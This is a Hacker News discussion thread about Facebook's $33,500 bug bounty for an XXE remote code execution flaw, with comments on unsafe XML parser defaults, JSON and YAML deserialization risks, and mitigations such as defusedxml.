Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
We recently awarded our biggest bug bounty payout (facebook.com)
113 points by projuce on Jan 22, 2014 | hide | past | favorite | 31 comments


XXE's are awful. You wouldn't think that simply by parsing an XML file --- something so simple people are tempted to do it with regexes --- you'd be invoking machinery that translates the XML language and binds it to, in effect, scripting language features. But that's what you're doing when you use common XML libraries!

For applications on mainstream stacks, if you accept XML inputs (explicitly accept them, that is; as in, invoke the XML parser yourself) and haven't taken the time to make sure you're not expanding entities, the safest bet is to assume that your XML parser has a "let inbound XML run shell commands" feature embedded into it. That's an oversimplification, but maybe not much of one.

This is a great, subtle finding. And Reginaldo handled it like a pro. Let the feeding frenzy for hiring Reginaldo Silva... commence! :)


I don't know if you read it, but I sent you an email about this same bug (when I originally found it in Drupal) in 2012. Didn't know FB was vulnerable back then. By the way, I learned a lot from you here on HN. So let me take this opportunity and say thank you very much.


I did! I responded to your first mail, too! :)

When I saw your name, it looked familiar, and I went and looked up your old mail. Great work! Congrats on an awesome finding.


So by default many XML libraries essentially allow remote code execution?

How in the world is that ok? How is that the standard?


which platforms? Really I am curious. Checking our XML in processors and there is nothing there that could lead to execution of what is within the XML.

Are there examples somewhere I can see to understand how this is even possible?


Not just XML, JSON parsers are notoriously vulnerable as well.


Citation needed.

There have been many vulnerabilities in YAML parsers for ruby because they let you encode actual objects / code.

JSON, despite being "Javascript object notation", can't actually encode full code/objects. You only have a few datatypes: (off the top of my head) bools, strings, numbers, arrays, key/value dicts. None of these are dangerous or difficult to parse.

What you might be thinking about is the recent Ruby on Rails vulnerability which was caused by transforming JSON into YAML and then parsing the YAML. It would be more accurate to say the YAML parser was vulnerable.

Your claim that "JSON parsers are notoriously vulnerable" implies that this is a common occurrence as well, not just a single incidence.

I personally don't see it as likely because JSON has pretty much no features compared to xml; the surface area is tiny.


Not exactly remote execution, but the parsing and construction of key/value dictionaries can be and has been exploited [1].

[1] http://arstechnica.com/business/2011/12/huge-portions-of-web...


Agreeing with the other statement: a JSON deserializer should never be executing arbitrary code as part of a feature of the deserializer. YAML, Python pickle, PHP serialization, etc. all allow serialization of arbitrary class instances by default, but JSON only allows simple data types.

So, no clue where you're getting that from.


Examples like these are the reason why I like to avoid XML. Unless your using something that actually takes advantage of the tree structure of xml and needs it's features, it's really overcomplicated overkill that can bite you in the ass.

%95 of the time your just using XML like another JSON/serialization format and you should definitely be using something just as lightweight.


Hi HN, I'm the one who found the bug. My writeup is at http://www.ubercomp.com/posts/2014-01-16_facebook_remote_cod.... I'd be glad to answer any questions. I won't disclose the amount for now because I want to know what people think this would be worth, but eventually it will be disclosed. If you run an OpenID-enabled server now it's a great time to make sure your implementation is patched.


Facebook disclosed it in the comments (about a minute after you made this comment).



Ha. Clearly Facebook doesn't care about privacy.. I wonder if they even asked him first.


The way they disclosed it:

> Reginaldo agreed we could share the payout, it was $33,500 for this issue.


Apologies for making the assumption that based on how OP stated it, assumed that he had full control over disclosure. I'd still prefer to hear from OP, as Facebook can say what they want or could be mistaken on the finer details of what was or wasn't agreed upon.


Did Facebook ask you if they could disclose it? Because they did disclose it.


The fact that Facebook is paying $33,000 for a remote code execution bug might one of the big reasons that it's the biggest bug that's been reported to them.


I wonder whether the non-malicious applications of XML external entities outnumber the malicious applications.

Any HNers want to chime in with an account of actually using them for what they're meant for?


Any HNers want to chime in on XML <<used as an interchange format>> (for instance, as the payload format for a protocol) ever using entity definitions for any purpose?

Right now, I'd put money on "malicious uses" outnumbering "legitimate" uses.


I certainly haven't seen any.

This is a holdover to the SGML days, where this was a pretty important feature, and used quite frequently in many document formats required for government contracting. As I recall, there was lots of consternation about stuff that was thrown away from SGML when XML was built, but this external entity stuck.


The payment was apparently USD 33'500.


Yup, confirmed by Facebook on the linked blog post.

That seems like a nice chunk of money. I can't help but think about how much his exploit would be worth on the black market though. 10x that amount maybe? I have no clue.

Either way, being able to put a bug find like this on your resume is probably worth a lot more than those payouts.


/Leaving aside XML techno babble/:

>>> ... We knew we wanted to pay out a lot because of the severity of the issue, so we decided to average the payout recommendations across a group of our program administrators. As always, we design our payouts to reward the hard work of researchers who are already inclined to do the right thing and report bugs to the affected vendors. ... >>>

So, instead of awarding bounty to the researcher who found and intelligently handled the disclosure of the issue, Facebook "decided to average the payout" in order to keep part of the bounty to themselves, rewarding themselves for "hard work" and glorifying themselves for "awarding our biggest bug bounty payout ever" ?


I read it as "ask a bunch of our guys for what they think it's worth, and pay out the average of those recommendations", but I'd have expected that to be pretty standard practice for any serious & non-obvious case.


XXE's are nasty. Back in the early 2000's I found every single Java RSS parsers (pack then that was an important thing) was vulnerable.

I submitted patches for them all, but it was kinda nasty to fix in Java, because each XML parser had different custom properties to set. https://github.com/rometools/rome/blob/master/src/main/java/... is the hackiness I had to do for ROME.


Fixing XXEs in Java is not a trivial thing to do. The best reference I know comes from Apache shindig [1], and you do have to make all those BUILDER_FACTORY.setAttribute calls, otherwise you block general external entities but allow parameter entities, which still leaves you vulnerable.

[1] http://svn.apache.org/repos/asf/shindig/trunk/java/common/sr...


This was in PHP but the problem exists in most languages. For all of you python programmers out there check out defusedxml and use it. They have a good explanation of many of the dangers in XML parsing:

https://pypi.python.org/pypi/defusedxml


If they went the NIH way and implemented the XML parsing themselves, this never would have been an issue.


What a silly comment.

Firstly, how can you be sure HN hasn't introduced the same, or a similar bug? Writing your own implementations does not make them secure.

Secondly, I don't understand why you are suggesting that people should always write their own implementations. Should I write my own servlet container rather than using Tomcat?


No, it's ironic in a way. Usually rewriting a standard piece of code is not so useful. In this case, if you wrote an XML parser, you'd probably skip over this part and end up secure.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: